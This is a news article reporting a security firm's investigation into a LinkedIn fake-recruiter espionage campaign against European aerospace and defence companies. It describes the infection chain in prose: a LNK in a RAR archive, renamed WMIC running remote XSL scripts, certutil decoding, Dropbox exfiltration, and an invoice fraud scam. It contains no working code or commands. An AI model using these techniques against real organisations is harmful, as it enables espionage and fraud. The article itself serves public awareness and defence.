View all newsletters
Receive our newsletter - data, insights and analysis delivered to you
  1. Technology
  2. Cybersecurity
June 18, 2020updated 06 Jul 2022 5:59am

How Did These Social Engineering Attacks Trick Aerospace Blue Chips Into Opening the Doors for Hackers?

"Our company welcomes elites like you"

By claudia glover

European aerospace and military blue chips have been targeted by a sophisticated espionage campaign that involved the use of previously unseen malware, as well as social engineering, security firm ESET has revealed — after an investigation conducted alongside two of the affected firms.

The attackers took their first step to infiltrating the networks by luring employees in with the promise of a job from a rival business, then slipping malware into documents purportedly containing further information about roles. The attackers set up LinkedIn profiles masquerading as recruiters at major contractors Collins Aerospace and General Dynamics.

In a report released this week by Slovakia-headquartered ESET, the company said the attacks were launched between September and December 2019.

(To a casual observer and perhaps as a native English speaker, the LinkedIn overtures look deeply unconvincing and notably suspicious: “As you are a reliable elite, I will recommend you to our very important department“, reads one message. Viewing them is a reminder that social engineering attacks often do not to be polished to still be hugely effective as a threat vector).

The initial shared file did contain salary details, but it was a decoy.

“The shared file was a password-protected RAR archive containing a LNK file,” said ESET. “When opened, the LNK file started a Command Prompt that opened a remote PDF file in the target’s default browser.”

“In the background, the Command Prompt created a new folder and copied the WMI Commandline Utility (WMIC.exe) to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied WMIC.exe.”

ESET has publised IOCs on its GitHub repo here

Once in, the malware was significantly more sophisticated than the social engineering attempts: “The attackers used WMIC to interpret remote XSL scripts, certutil to decode base64-encoded downloaded payloads, and rundll32 and regsvr32 to run their custom malware,” ESET said.

Content from our partners
How to turn the evidence hackers leave behind against them
Why food manufacturers must pursue greater visibility and agility
How to define an empowered chief data officer

Malware flow. Credit: ESET

Once in the system the attackers were able to do two things. One was to look around for sensitive information, that they exfiltrated using custom built, open source code that uploaded files onto a DropBox account.

The other was to harvest internal data to carry out further Business Email Compromise scams on staff across the company. Worryingly, the attackers also digitally signed some components of their malware, including a custom downloader and backdoor, and the dbxcli tool.

“The certificate was issued in October 2019 – while the attacks were active – to 16:20 Software, LLC.,” ESET noted.

Read This! US Agency in Fresh North Korean Hacker Warning

Later in the campaign, the attackers also sought to monetise their access, by finding unpaid invoices and attempting to exploit these.

“They followed up the conversation and urged the customer to pay the invoice, however, to a different bank account than previously agreed (see Figure 8), to which the customer responded with some inquiries.

“As part of this ruse, the attackers registered an identical domain name to that of the compromised company, but on a different top-level domain, and used an email associated with this fake domain for further communication with the targeted customer”.

This is where they were thwarted, however, as an alert customer checked in on a legitimate email address at the aerospace company to enquire about the shady request and the scam was flagged.

Ultimately neither malware analysis nor the broader investigation allowed post-incident response to “gain insight” into what files the Operation In(ter)ception attackers were after”, ESET says: “However, the job titles of the employees targeted via LinkedIn suggest that the attackers were interested in technical and business-related information.”

It tentatively attributed the attack to the North Korean APT, Lazarus, saying “we have seen a variant of the Stage 1 malware that carried a sample of Win32/NukeSped.FX, which belongs to a malicious toolset that ESET attributes to the Lazarus group” but admitted it lacks compelling evidence.

Attackers for high value targets like this can be persistent, creative, and use some unusual techniques. Earlier this year a leading UK cybersecurity law enforcement officer warned CISOs that he was seeing a “much larger increase in physical breaches” , with cybercrime groups planting moles in cleaning agencies to gain hardware access.

Read this: Police Warning: Cyber Criminals Are Using Cleaners to Hack Your Business

Websites in our network
Select and enter your corporate email address Tech Monitor's research, insight and analysis examines the frontiers of digital transformation to help tech leaders navigate the future. Our Changelog newsletter delivers our best work to your inbox every week.
  • CIO
  • CTO
  • CISO
  • CSO
  • CFO
  • CDO
  • CEO
  • Architect Founder
  • MD
  • Director
  • Manager
  • Other
Visit our privacy policy for more information about our services, how New Statesman Media Group may use, process and share your personal data, including information on your rights in respect of your personal data and how you can unsubscribe from future marketing communications. Our services are intended for corporate subscribers and you warrant that the email address submitted is your corporate email address.
THANK YOU